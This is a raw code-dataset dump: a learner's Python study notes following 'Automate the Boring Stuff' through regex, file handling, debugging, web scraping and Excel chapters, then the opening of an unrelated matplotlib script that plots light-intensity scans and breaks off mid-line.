Batman')\nmo1.group()\nmo2 = batRegex.search('The Adventures of Batwoman')\nmo2.group()\n#(wo)? means that part of the string is optional in the search\n#relate to finding phone numbers with or without a area code\nphoneRegex = re.compile(r'(\\d\\d\\d-)?\\d\\d\\d-\\d\\d\\d\\d')\nmo1 = phoneRegex.search('My number is 415-555-4242')\nmo1.group()\nmo2 = phoneRegex.search('My number is 555-4242')\nmo2.group()\n# a * can be used as a optional OR multiple segment search. 0 or more\nbatRegex = re.compile(r'Bat(wo)*man')\nmo1 = batRegex.search('The Adventures of Batwowowowoman')\nmo1.group()\n# a + will mean 1 or more, so not 0.\n#match specific repetitions with {}\n#(ha){3} = (ha)(ha)(ha)\n#or (ha){3,5} - can match 3, 4, or 5 instances of (ha)\ngreedyHaRegex = re.compile(r'(Ha){3,5}')\nmo1 = greedyHaRegex.search('HaHaHaHaHa')\nmo1.group()\n#greedy (longest string) vs nongreedy '?' (shortest string possible)\nnongreedyHaRegex = re.compile(r'(Ha){3,5}?')\nmo2 = nongreedyHaRegex.search('HaHaHaHaHa')\nmo2.group()\n#findall() - return every match in a searched string\n# will return list of strings if no groups, or a list of tuples \n#with their component strings if there are groups\nphoneNumRegex = re.compile(r'\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d')\nphoneNumRegex.findall('Cell: 415-555-7788 work: 212-555-0000')\n#groups -> tuples\nphoneNumRegex = re.compile(r'(\\d\\d\\d)-(\\d\\d\\d)-(\\d\\d\\d\\d)')\nphoneNumRegex.findall('Cell: 415-555-7788 work: 212-555-0000')\n\n########################\n#character classes\n#\\d Any numeric digit from 0 to 9.\n\n#\\D Any character that is not a numeric digit from 0 to 9.\n\n#\\w Any letter, numeric digit, or the underscore character.\n#(Think of this as matching “word” characters.)\n\n#\\W Any character that is not a letter, numeric digit, or the\n#underscore character.\n\n#\\s Any space, tab, or newline character. (Think of this as\n#matching “space” characters.)\n\n#\\S Any character that is not a space, tab, or newline.\n#########################\n\n#more stuff i skipped - highlighted chart in book for referece\n#case-insensitive matching - pass re.IGNORECASE or re.I as second argument\nrobocop = re.compile(r'robocop', re.I)\nrobocop.search('Robocop is part man, part machine, all cop.').group()\nrobocop.search('ROBOCOP protects the innocent.').group()\n#substituting string with the sub() method argument\nnamesRegex = re.compile(r'Agent \\w+')\nnamesRegex.sub('REDACTED', 'Agent Alice gave the documents to Agent Bob')\n\n#end page 163\n\n#regex can only handle 1 additional argument, can get multiple by piping\n\n#Project - create phone number and email regex from clipboard\n#skipping for now, get the idea and need to install pyperclip\nphoneRegex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))? ` # area code\n (\\s|-|\\.)? # separator\n \\d{3} # first 3 digits\n (\\s|-|\\.) # separator\n \\d{4} # last 4 digits\n (\\s*(ext|x|ext.)\\s*\\d{2,5})? # extension\n )''', re.VERBOSE)\n\n#skipping practice problems for now, regex's are getting dull af\n\n#Chapter 8 - Reading and Writing files (on the harddrive)\n#directories and filenames are not case-sensitive on windows.\nimport os\nos.path.join('usr','bin','spam')\n#remember that backslashes need to be escaped by another (therefore double)\nmyFiles = ['accounts.txt', 'details.csv', 'invite.docx']\nfor filename in myFiles:\n print(os.path.join('C:\\\\Users\\\\asweigart', filename))\n#current working directory\nimport os\nos.getcwd()\n#absolute vs relative paths.\n#sbsolute - always begins at root (ex. C:\\), relative related to CWD\n# .\\ = this directory, ..\\ parent directory\n#creating directories\nimport os\nos.makedirs('C:\\\\delicious\\\\walnut\\\\waffles')\n#os.path Module\nimport os\nos.path.abspath('.')\nos.path.abspath('.\\\\Scripts')\nos.path.isabs('.')\nos.path.isabs(os.path.abspath('.'))\n#?\npath = 'C:\\\\Windows\\\\System32\\\\calc.exe'\nos.path.basename(path)\nos.path.dirname(path)\n#or to get both together in a tuple\nos.path.split(path)\nos.path.getsize(path)\n#There are three steps to reading or writing files in Python.\n#1. Call the open() function to return a File object.\n#2. Call the read() or write() method on the File object.\n#3. Close the file by calling the close() method on the File object.\nos.getcwd() #i dont get this\nhelloFile = open('C:\\\\users\\\\matthew\\\\hello.txt')\nhelloContent = helloFile.read()\nhelloContent\n#to get a lsit of string values from the file, one for each line of text\nsonnetFile = open('sonnet29.txt')\nsonnetFile.readlines()\n#Writing Files - writing mode with 'w' (overwrites), appending with 'a'\nbaconFile = open('bacon.txt', 'w')\nbaconFile.write('Hello World!\\n')\nbaconFile.close()\nbaconFile = open('bacon.txt', 'a')\nbaconFile.write('Bacon is not a vegetable')\nbaconFile.close()\nbaconFile = open('bacon.txt')\ncontent = baconFile.read()\nbaconFile.close()\nprint(content)\n#with write() you have to add newlines to the ends manually with \\n\n#save variables with the shelve method\nimport shelve\nshelfFile = shelve.open('mydata')\ncats = ['Zophie','Pooka','Simon']\nshelfFile['cats'] =cats\nshelfFile.close()\n#shelf files dont have to be opened in read/write mode, they can do both.\n#Checking\nshelfFile = shelve.open('mydata')\ntype(shelfFile)\nshelfFile['cats']\nshelfFile.close()\n#like dictionaries, shelves have keys and values attached to them.\nshelfFile = shelve.open('mydata')\nlist(shelfFile.keys())\nlist(shelfFile.values())\nshelfFile.close()\n#saving variables with the pprint.pformat() function\nimport pprint\ncats = [{'name': 'Zophie', 'desc': 'chubby'}, {'name': 'Pooka', 'desc' : 'fluffy'}]\npprint.pformat(cats)\nfileObj = open('myCats.py', 'w') \nfileObj.write('cats = ' + pprint.pformat(cats) + '\\n')\nfileObj.close()\n#list of dictionaries stored in variable cats - retriveable even after\n#shell is closed via pprint.pformat()\n#when string is saved to a .py file, now a module that can be imported\nimport myCats\nmyCats.cats\nmyCats.cats[0]\nmyCats.cats[0]['name']\n\n#PROJECT - Random quiz questions\nimport random\n# The quiz data. Keys are states and values are their capitals.\ncapitals = {'Alabama': 'Montgomery', 'Alaska': 'Juneau', 'Arizona': 'Phoenix',\n'Arkansas': 'Little Rock', 'California': 'Sacramento', 'Colorado': 'Denver',\n'Connecticut': 'Hartford', 'Delaware': 'Dover', 'Florida': 'Tallahassee',\n'Georgia': 'Atlanta', 'Hawaii': 'Honolulu', 'Idaho': 'Boise', 'Illinois':\n'Springfield', 'Indiana': 'Indianapolis', 'Iowa': 'Des Moines', 'Kansas':\n'Topeka', 'Kentucky': 'Frankfort', 'Louisiana': 'Baton Rouge', 'Maine':\n'Augusta', 'Maryland': 'Annapolis', 'Massachusetts': 'Boston', 'Michigan':\n'Lansing', 'Minnesota': 'Saint Paul', 'Mississippi': 'Jackson', 'Missouri':\n'Jefferson City', 'Montana': 'Helena', 'Nebraska': 'Lincoln', 'Nevada':\n'Carson City', 'New Hampshire': 'Concord', 'New Jersey': 'Trenton', 'New Mexico': 'Santa Fe', 'New York': 'Albany', 'North Carolina': 'Raleigh',\n'North Dakota': 'Bismarck', 'Ohio': 'Columbus', 'Oklahoma': 'Oklahoma City',\n'Oregon': 'Salem', 'Pennsylvania': 'Harrisburg', 'Rhode Island': 'Providence',\n'South Carolina': 'Columbia', 'South Dakota': 'Pierre', 'Tennessee':\n'Nashville', 'Texas': 'Austin', 'Utah': 'Salt Lake City', 'Vermont':\n'Montpelier', 'Virginia': 'Richmond', 'Washington': 'Olympia', 'WestVirginia':\n'Charleston', 'Wisconsin': 'Madison', 'Wyoming': 'Cheyenne'}\ncapitals\nfor quizNum in range(35):\n #creates quiz and answer key files\n quizFile = open('capitalsquiz%.txt' % (quizNum + 1), 'w') \n answerKeyFile = open('capitalsquiz_answers%s.txt' % (quizNum +1), 'w')\n #write out header for this quiz\n quizFile.write('Name:\\n\\nDate:\\n\\nperiod:\\n\\n')\n quizFile.write((' ' * 20)+ 'State Capitals Quiz (Form %s)' % (quizNum +1))\n quizFile.write('\\n\\n')\n #shuffle order of the states\n states = list(capitals.keys())\n random.shuffle(states)\n #loop through all states, 1 question each\n for questionNum in range(50):\n #get right and wrong answers ( 4 total option)\n correctAnswer = capitals[states[questionNum]]\n wrongAnswers = list(capitals.values())\n del wrongAnswers[wrongAnswers.index(correctAnswer)]\n wrongAnswers = random.sample(wrongAnswers, 3)\n answerOptions = wrongAnswers + [correctAnswer]\n random.shuffle(answerOptions)\n #write questions and answer options to the quiz file\n quizFile.write('%s. What is the capital of %s?\\n' % (questionNum + 1,\n states[questionNum]))\n for i in range(4):\n quizFile.write(' %s. %s\\n' % ('ABCD'[1], answerOptions[1]))\n quizFile.write('\\n')\n #write the answer key to a file\n answerKeyFile.write('%s. %s\\n' % (questionNum + 1, 'ABCD'[\n answerOptions.index(correctAnswer)]))\n quizFile.close()\n answerKeyFile.close()\n\n#i understand the code steps but i have no idea why this doesnt work\n#practice programs skipped\n#end chapter 8\n\n#Start Chapter 9 - Organizing Files\nimport shutil, os\nos.chdir('C:\\\\')\n#moves a copy to the new directory with the same filename\nshutil.copy('C:\\\\spam\\\\spam.txt', 'C:\\\\Delicious')\n#moves a copy to the new directory with a new name\nshutil.copy('C:\\\\spam\\\\eggs.txt', 'C:\\\\Delicous\\\\eggs2.txt')\n#to move an entire tree, (From, to)\nshutil.copytree('C:\\\\bacon', 'C\\\\Delicious')\n#can move without copy tooo, shutil.move()\nshutil.move('C:\\\\bacon.txt', 'C:\\\\eggs')\n#careful with move, will overwrite existing files with the same name\n#if you write the wrong name for a directory, will rename the file to that name\n#move() is dumb and will do something no matter what you intended. \n### Deleting\nos.unlink('path') # will delete the file at path\nos.rmdir('path') # will delete empty folder at path\nshutil.rmtree('path') # will remove the folder and all containing files\n#PERMANENT DELETIONS <<< not recoverable. \n#good way to test for errors, comment out delete lines and print instead\n#Ex:\nimport os\nfor filename in os.listdir():\n if filename.endswith('.rxt'):\n #os.unlink(filename)\n print(filename)\n#this way will print, not delete the files due to TYPO!\n#if working correctly, then can un-comment the os.unlink line\nos.chdir('C:\\\\Users\\Matthew\\Documents\\GitHub\\BioInf')\nos.getcwd()\n\nimport send2trash\nbaconFile = open('bacon.txt', 'a') #creates the file\nbaconFile.write('Bacon is not a vegetable.')\nbaconFile.close()\nsend2trash.send2trash('bacon.txt')\n#os.walk() to walk down an entire directory, modifying all folders and files\nos.getcwd()\nimport os\nfor folderName, subfolders, filenames in os.walk('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf\\\\Delicious'):\n print('The current folder is ' + folderName)\n for subfolder in subfolders:\n print('SUBFOLDER OF ' + folderName + ': ' + subfolder)\n for filename in filenames:\n print('FILE INSIDE ' + folderName + ': ' + filename)\n print('')\n#compressing files with the zipfile module\nimport zipfile, os\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nexampleZip = zipfile.ZipFile('potato.zip')\nexampleZip.namelist()\nspamInfo = exampleZip.getinfo('spam.txt')\nspamInfo.file_size\nspamInfo.compress_size\n'Compressed file is %sx smaller!' % (round(spamInfo.file_size / spamInfo.compress_size, 2))\nexampleZip.close()\n#extracting from Zip with extractall()\nimport zipfile, os\nexampleZip = zipfile.ZipFile('potato.zip')\nexampleZip.extractall()\nexampleZip.close()\n#alternatively, to a new folder\nimport zipfile, os\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nexampleZip = zipfile.ZipFile('potato.zip')\nexampleZip.extract('potato.zip', 'folderZ')\n#done with all that shit, i never zip anyway\n###################\n#page 207\n#Project Renaming dates from US format to EU format. \nimport shutil, os, re\n#creates regex to match files with the american date format\ndatePattern = re.compile(r\"\"\"^(.*?) # all text before the date\n ((0|1)?\\d)- # one or 2 digets for the month\n ((0|1|2|3)?\\d)- # one of 2 digets for the day\n ((19|20)\\d\\d) # four digets for the year\n (.*?)$ # all text after the date\n \"\"\", re.VERBOSE)\n#loop over the files in the working directory\nfor amerFilename in os.listdir('.'):\n mo = datePattern.search(amerFilename)\n #skip files without date\n if mo == None:\n continue\n #get the different parts of the filename\n beforePart = mo.group(1)\n monthPart = mo.group(2)\n dayPart = mo.group(4)\n yearPart = mo.group(6)\n afterPart = mo.group(8)\n\ndatePattern = re.compile(r\"\"\"^(1) # all text before the date\n (2 (3) )- # one or two digets for the month \n (4 (5) )- # one or two digets for the day\n (6 (7) )- # four digets for the year\n (8)$ # all text after the date\n \"\"\", re.VERBOSE)\n#form the new filename and rename the files\n #form euro filenames\neuroFilename= beforePart + dayPart + '-' + monthPart + '-' + yearPart + afterPart\n#get the full, absolute file paths\nabsWorkingDir = os.path.abspath('.')\namerFilename = os.path.join(absWorkingDir, amerFilename)\neuroFilename = os.path.join(absWorkingDir, euroFilename)\n#rename the files\nprint('Renaming \"%s\" to \"%s\"...' % (amerFilename, euroFilename))\n#shutil.move(amerFilename, euroFilename) # uncomment after testing\n#doesnt work becaue actually needs to run on test files to fill out variables\n#############\n#2nd program: Backing up to ZIP - page 210\n#practice problems skipped for now. \n#End Chapter 9 \n\n\n#Chapter 10 - Debugging - [lots to study and take notes on]\n#Raising an Exception = “Stop running the code in this function\n#and move the program execution to the except statement.”\nraise Exception('This is an error message.') #Exception is case sensitive\n#if no try / except statements, will just display the error message\n#often code that calls a function that is built to handle and exception\ndef boxPrint(symbol, width, height):\n if len(symbol) !=1:\n raise Exception('Symbol must be a single character string.')\n if width <=2:\n raise Exception('Width must be greater than 2.')\n if height <=2:\n raise Exception('Height must be greater than 2.')\n print(symbol*width)\n for i in range(height -2):\n print(symbol + (' ' * (width - 2)) + symbol)\n print(symbol*width)\n#This is now running it multiple times with different parameters\n#'*' 4x4, '0' 20x5, etc.\nfor sym, w, h in(('*', 4, 4), ('0', 20, 5), ('x', 1, 3), ('ZZ', 3, 3)):\n try:\n boxPrint(sym, w, h)\n except Exception as err:\n print('An exception has happened: ' + str(err))\n#try and except allows you to handle errors instead of a whole program crash\n#Getting the traceback as a string:\ndef spam():\n bacon()\ndef bacon():\n raise Exception('This is an error messgage.')\nspam()\n#use traceback to get an error message for debugging without killin a running program\nimport traceback\ntry:\n raise Exception('This is an error message.')\nexcept:\n errorFile = open('errorInfo.txt', 'w')\n errorFile.write(traceback.format_exc())\n errorFile.close()\n print('The traceback info was written to errorInfo.txt.')\n\nimport os\nos.getcwd()\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nos.getcwd()\n#I dont understand how the working directory functions. Maybe due to\n#the continued script ive been using for learning.\n#############################\n#Assertions: # Sanity check to see if code isnt doing something obvs wrong\n# Components:\n#• The assert keyword\n#• A condition (that is, an expression that evaluates to True or False)\n#• A comma\n#• A string to display when the condition is False\npodBayDoorStatus = 'open'\nassert podBayDoorStatus == 'open', 'The pod bay doors need to be \"open\".'\npodBayDoorStatus = 'I\\'m sorry Dave. I\\'m afraid I cant do that.'\nassert podBayDoorStatus == 'open', 'The pod bay doors need to be \"open\".'\n#assertions are error checking to make sure that something you are relying\n#upon down the code isnt in a different state from something higher up.\n#for programmer, not user errors\n\n#Assertions can be disabled by passing -O when running python. \n#to speed up programs once debugging is done. \n##################\n#Logging: #similar to prints to ensure a section has run. \nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\n#Ex:\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\nlogging.debug('Start of program')\n\ndef factorial(n):\n logging.debug('Start of factorial(%s%%)' % (n))\n total = 1\n for i in range(n+1):\n total *= i \n logging.debug('i is ' + str(i) + ', total is ' + str(total))\n logging.debug('End of factorial(%s%%)' % (n))\n return total\n\nprint(factorial(5))\nlogging.debug('End of program')\n#Ex:\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\nlogging.debug('Start of program')\n\ndef factorial(n):\n logging.debug('Start of factorial(%s%%)' % (n))\n total = 1\n for i in range(1, n+1): #fixed this ex\n total *= i \n logging.debug('i is ' + str(i) + ', total is ' + str(total))\n logging.debug('End of factorial(%s%%)' % (n))\n return total\n\nprint(factorial(5))\nlogging.debug('End of program')\n#logging is useful because then print statements dont need to be all over your program to be disabled later.\n#Can cancel all logging outputs with one disable statement\n\n#logging can be at different levels depending on the severity\n#debugging mode (toolbar) can be used to go line by line to evaluate what a program is doing,\n#what every variable is set to at each line etc. \n#skipped for now - not relevant for the moment- also uses idle not spyder\n#Skipped practice problems for same reason.\n#end Chapter 10\n#########################\n\n#Chapter 11 - Web Scraping\n#using a program to download and process content from the web\n\n#Project: mapIt.py with webbrowser module\nimport webbrowser\nwebbrowser.open('http://inventwithpython.com/')\n#example of webbrowser - basically all it does\n#now to make a program to open a map from a place on clipboard\n\n#! python3\n#mapIt.py - Launches a map in the browser using an address from command line\n\nimport webbrowser, sys, pyperclip\nif len(sys.argv) >1:\n #get address from command line\n address = ' '.join(sys.argv[1:])\n#webbrowser to launch web, sys to read command line stuff\n#ensuring the command line arguments (>1) are all accounted for\nelse:\n #get address from clipboard\n address = pyperclip.paste()\nwebbrowser.open('https://www.google.com/maps/place/' + address)\n#\n\n#Downloading files from the web with Requests module\n#requests.get()\nimport requests\nres = requests.get('http://www.gutenberg.org/cache/epub/1112/pg1112.txt')\ntype(res)\n#checking to see if the download has succeeded\nres.status_code == requests.codes.ok\nlen(res.text)\n#checking for errors - always call raise_for_status() after \n#calling requests.get() to make sure download worked b4 continueing\nimport requests\nres = requests.get('https://inventwithpython.com/page_doesnt_exist')\ntry:\n res.raise_for_status()\nexcept Exception as exc:\n print('There was a problem: %s' % (exc))\n#saving downloaded files to the harddrive\n#from here, can open() and write() file, but first need to open in \n #'write binary' mode to keep encoding correct\nimport requests\nres = requests.get('https://www.gutenberg.org/cache/epub/1112/pg1112.txt')\nres.raise_for_status()\nplayFile = open('RomeoAndJuliet.txt', 'wb') #wb for write binary\nfor chunk in res.iter_content(100000):\n playFile.write(chunk)\nplayFile.close()\n#To review, here’s the complete process for downloading and saving a file:\n#1. Call requests.get() to download the file.\n#2. Call open() with 'wb' to create a new file in write binary mode.\n#3. Loop over the Response object’s iter_content() method.\n#4. Call write() on each iteration to write the content to the file.\n#5. Call close() to close the file.\n############################\n#Need some HTML basics before you can really pick apart web pages\n#Everything is placed between starting and ending tags to separate out \n#the content into different roles/contexts\n#html is plaintext with the .html file extension\n\n#rightclick pages to see source files, hit f12 to look into dev view\n#using regex's to find info in HTML is advised against - hard to do\n#Beautiful soup is used to extract information from a html page\n#module titled bs4\nimport requests, bs4\nres = requests.get('http://nostarch.com')\nres.raise_for_status()\nnoStarchSoup = bs4.BeautifulSoup(res.text)\ntype(noStarchSoup)\n#or load an html file from your harddrive\nimport os\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nexampleFile = open('example.html')\nexampleSoup = bs4.BeautifulSoup(exampleFile)\ntype(exampleSoup)\n#retreve web page element by calling select() and passing a CSS selector\n#somilar to regex, find patterns in html\n#table in page 246 of CSS selector examples\n#VERY DEEP TOPIC TO GET CONFUSED BY\nimport bs4\nexampleFile = open('example.html')\nexampleSoup = bs4.BeautifulSoup(exampleFile.read())\nelems = exampleSoup.select('#Author')\ntype(elems)\nlen(elems) #should be 1 according to the book\ntype(elems[0])\n#already broken, no idea why\npElems = exampleSoup.select('p')\nstr(pElems[0])\npElems[0].getText()\nstr(pElems[1])\npElems[1].getText()\nstr(pElems[2])\npElems[2].getText()\n#2 projects described,1 a google search and auto link open in new tab \n#2 a downloader for all XKCD comics\n#no interest in these ends at the moment, can always return\n#end chapter 11\n\n#Start Chapter 12 - Working with Excel Spreadsheets w openpyxl\n#one excel file is a 'workbook' that can contain multiple 'sheets'\n#columns in letters, rows in numbers - each cell has a coordinate\nimport os\nos.chdir('C:\\\\Users\\\\Matthew\\\\Documents\\\\GitHub\\\\BioInf')\nimport openpyxl\nwb = openpyxl.load_workbook('example.xlsx')\ntype(wb)\n#Book is broken and outdated - great\nfrom openpyxl import load_workbook\nwb = load_workbook('example.xlsx')\nprint(wb.sheetnames)\nsheet3 = wb['Sheet3']\nsheet1 = wb['Sheet1']\nsheet1['A1'].value\nsheet1['B3'].value\nc = sheet1['B1']\nc.value\n'Row ' + str(c.row) + ', Column ' + str(c.column) + ' is ' + c.value\n#c.column is returning a integer in place of the letter.. hmm\n#auto converting?\nsheet1['C1'].value\nc.column\n#can specify specific locations by row and column number\nsheet1.cell(row=1, column=2).value\nfor i in range(1, 8, 2): # 1-8, counting by 2's == Only odd #'s\n print(i, sheet1.cell(row=i, column=2).value)\n#size of sheet commands OLD AND OUTDATED\nsheet1.get_highest_row()\nsheet1.get_highest_column()\n#now:\nsheet1.max_row() #errors\nsheet1.max_row #This works, no () for some reason\n#got the answer - max_row is not a function its a value\nsheet1.max_column\n#rows and columns from sheets\ntuple(sheet1['A1':'C3'])\nfor rowOfCellObjects in sheet1['A1':'C3']:\n for cellObj in rowOfCellObjects:\n print(cellObj.coordinate, cellObj.value)\n print('--- END OF ROW ---')\n\nsheet1[1] #row 1 \nfor i in sheet1[1]:\n print(i.value)\n\nsheet1.columns[1] #old and broken\n\nlist(sheet1.columns)[1] #new and not broken\nfor obj in list(sheet1.columns)[1]:\n print(obj.value)\n#Example Project - State Data\nwb = load_workbook('censuspopdata.xlsx')\nprint(wb.sheetnames)\nsheet = wb['Population by Census Tract']\n#now the sheet is called sheet and loaded in ready to go\ncountyData = {}\nprint('Reading rows...')\nfor row in range(2, sheet.max_row +1):\n state = sheet['B' +str(row)].value\n county = sheet['C' +str(row)].value\n pop = sheet['D' +str(row)].value\n#now to open a new text file and write contents to it\n#dictionary with state abbreviations as keys\n #makes sure key for this state exists\n countyData.setdefault(state, {})\n #makes sure key for county in state exists\n countyData[state].setdefault(county, {'tracts': 0, 'pop': 0})\n #each row rep one census tract, so increment by 1\n countyData[state][county]['tracts'] += 1\n #increase the county pop by the pop in this census tract\n countyData[state][county]['pop'] += int(pop)\n#all pop data will be now tabulated and keyed by state\n#time to write to a new file\n print('Writing results..')\n resultFile = open('census2010.py', 'w')\n resultFile.write('allData = ' + pprint.pformat(countyData))\n resultFile.close()\n print('Done.')\nimport census2010\ncensus2010.allData['AK']['Anchorage']\n\n\n\n","sub_path":"ATBS.py","file_name":"ATBS.py","file_ext":"py","file_size_in_byte":38614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"51952450","text":"#! /anaconda3/envs/Flasher/bin/python\n\n# This import registers the 3D projection, but is otherwise unused.\nfrom mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\nfrom matplotlib.patches import Polygon\nfrom matplotlib import colors\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\nimport datetime as dt\nimport seaborn as sns\nimport numpy as np\nimport scipy\nimport fitfunction as ff\nimport readout as readout\nfrom xkcd_colors import xkcd_colors\nfrom scipy import optimize\n\n\n\n\ndef plot_intensity_vs_time(time, current, current_std, color, path_to_file, time_label, rel_label):\n # time : time numpy array\n # current : current numpy array\n # std : standard deviation of the measurement numpy array\n # color : color as string type\n # path_to_file : path to the file as string type (usually a element of a file_list)\n # time_label : Boolean (True : print x labels as time format - False : print x labels as index format)\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n ax = plt.gca()\n line_width = 0.4\n\n if time_label:\n plt.xticks(rotation=60)\n xfmt = md.DateFormatter('%Y/%m/%d %H:%M:%S')\n ax.xaxis.set_major_formatter(xfmt)\n if rel_label:\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n rel_current *= np.array(100)\n delta_rel_current *= np.array(np.abs(100))\n\n plt.ylabel('Relative Intensity [%]')\n plt.title('Relative Intensity in time : {}'.format(plot_name))\n plt.plot(time, rel_current, '{}'.format(color), marker=',', linewidth=line_width)\n plt.fill_between(time, rel_current - delta_rel_current, rel_current + delta_rel_current, color=sns.xkcd_rgb[\"amber\"])\n plt.savefig('./Output/{}/{}_relative_time_stamps.png'.format(folder, plot_name), bbox_inches='tight')\n else:\n plt.ylabel('Current [nA]')\n plt.title('Intensity in time : {}'.format(plot_name))\n plt.plot(time, current, '{}'.format(color), marker=',', linewidth=line_width)\n plt.fill_between(time, current - current_std, current + current_std, color=sns.xkcd_rgb['amber'])\n plt.savefig('./Output/{}/{}_absolute_time_stamps.png'.format(folder, plot_name), bbox_inches='tight')\n else:\n if rel_label:\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n rel_current *= np.array(100)\n delta_rel_current *= np.array(np.abs(100))\n\n plt.ylabel('Relative Intensity [%]')\n plt.title('Relative Intensity in time : {}'.format(plot_name))\n plt.plot(range(len(current)), current, '{}'.format(color), marker=',', linewidth=line_width)\n plt.fill_between(range(len(rel_current)), rel_current - delta_rel_current, rel_current + delta_rel_current, color=sns.xkcd_rgb[\"amber\"])\n plt.savefig('./Output/{}/{}_relative_time_points.png'.format(folder, plot_name), bbox_inches='tight')\n else:\n plt.ylabel('Current [nA]')\n plt.title('Intensity in time : {}'.format(plot_name))\n plt.plot(range(len(current)), current, '{}'.format(color), marker=',', linewidth=line_width)\n plt.fill_between(range(len(current)), current - std, current + std, color=sns.xkcd_rgb[\"amber\"])\n plt.savefig('./Output/{}/{}_absolute_time_points.png'.format(folder, plot_name), bbox_inches='tight')\n plt.setp(ax.get_xticklabels(), rotation=30, ha=\"right\", rotation_mode=\"anchor\")\n plt.show()\n plt.clf()\n\n\ndef plot_intensity_scan_xy_2D(xo, xf, yo, yf, z, steps, path_to_file, rel_label, cam_label):\n # xo : beginning of X-axis\n # xf : end of X-axis\n # yo : beginning of Y-axis\n # yf : end of Y-axis\n # steps : number of measurements in along the axis X and Y (it should be equal in both axis)\n # path_to_file : path to the file as string type (usually a element of a file_list)\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n # cam_label : Boolean (True : draw camera - False : doesn't draw camera)\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n prefix = ''\n\n x = np.linspace(xo, xf, steps)\n y = np.linspace(yo, yf, steps)\n\n if rel_label:\n z = z / np.max(z)\n z = np.reshape(z, (steps, steps)) * np.array(100)\n prefix += 'relative'\n else:\n z = np.reshape(z, (steps, steps))\n prefix += 'absolute'\n\n # We need to take the transpose, otherwise we can't match the actually file position (x,y)\n z = z.T\n\n fig, ax = plt.subplots()\n im = ax.imshow(z, cmap=cm.viridis, interpolation='none', origin='lower', extent=[-15., 315., -15., 315.])\n\n ax.set_xticks(x)\n ax.set_yticks(y)\n\n plt.xlabel('x position [mm]')\n plt.ylabel('y position [mm]')\n\n if rel_label:\n plt.colorbar(im, label='Relative Intensity [%]')\n plt.title('Relative Data : {}'.format(plot_name))\n #plt.savefig('./Output/{}/{}_Data_2D_rel.png'.format(folder, plot_name), bbox_inches='tight')\n else:\n plt.colorbar(im, label='Intensity [nA]')\n plt.title('Absolute Data : {}'.format(plot_name))\n #plt.savefig('./Output/{}/{}_Data_2D.png'.format(folder, plot_name), bbox_inches='tight')\n\n # Loop over data dimensions and create text annotations.\n for i, xx in enumerate(x):\n for j, yy in enumerate(y):\n text = ax.text(yy, xx, np.around(z[i, j], decimals=2), ha=\"center\", va=\"center\", color=\"black\", size='6')\n\n fig.tight_layout()\n\n # Draw the Camera at a distance of 5.6 m wrt the flasher if \"cam_level\" si set True\n if cam_label:\n prefix += '_camON'\n r = 1120. / 2. # mm\n distance = 5.6 # m ~scaling factor for small angles\n x_center = 120.\n y_center = 120.\n\n angles = np.array((30., 90., 150., 210., 270., 330.)) * (np.pi / 180.)\n x_position, y_position = [r * np.cos(angles), r * np.sin(angles)]\n\n points = [[x_position[0], y_position[0]], [x_position[1], y_position[1]], [x_position[2], y_position[2]], [x_position[3], y_position[3]], [x_position[4], y_position[4]], [x_position[5], y_position[5]]] / np.array(distance)\n points = points + np.array([x_center, y_center])\n hexagon = Polygon(points, fill=False, edgecolor='black', linestyle='-', linewidth=0.5)\n #hexagon.set_alpha(0.1)\n ax.add_patch(hexagon)\n ax.set_aspect(aspect=1.0)\n ax.set_xlim((-15, 315))\n ax.set_ylim((-15, 315))\n ax.set_aspect(1)\n else:\n prefix += '_camOFF'\n\n plt.savefig('./Output/{}/{}_{}_2D.png'.format(folder, plot_name, prefix), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\ndef plot_intensity_scan_xy_3D(xo, xf, yo, yf, z, steps, path_to_file, rel_label):\n # xo : beginning of X-axis\n # xf : end of X-axis\n # yo : beginning of Y-axis\n # yf : end of Y-axis\n # steps : number of measurements in along the axis X and Y (it should be equal in both axis)\n # path_to_file : path to the file as string type (usually a element of a file_list)\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n prefix = ''\n\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ax.view_init(30, -45)\n xx = x = np.linspace(xo, xf, steps)\n yy = y = np.linspace(yo, yf, steps)\n x, y = np.meshgrid(x, y)\n\n if rel_label:\n z = z / np.max(z)\n z = np.reshape(z, (steps, steps)) * np.array(100)\n prefix += 'relative'\n else:\n z = 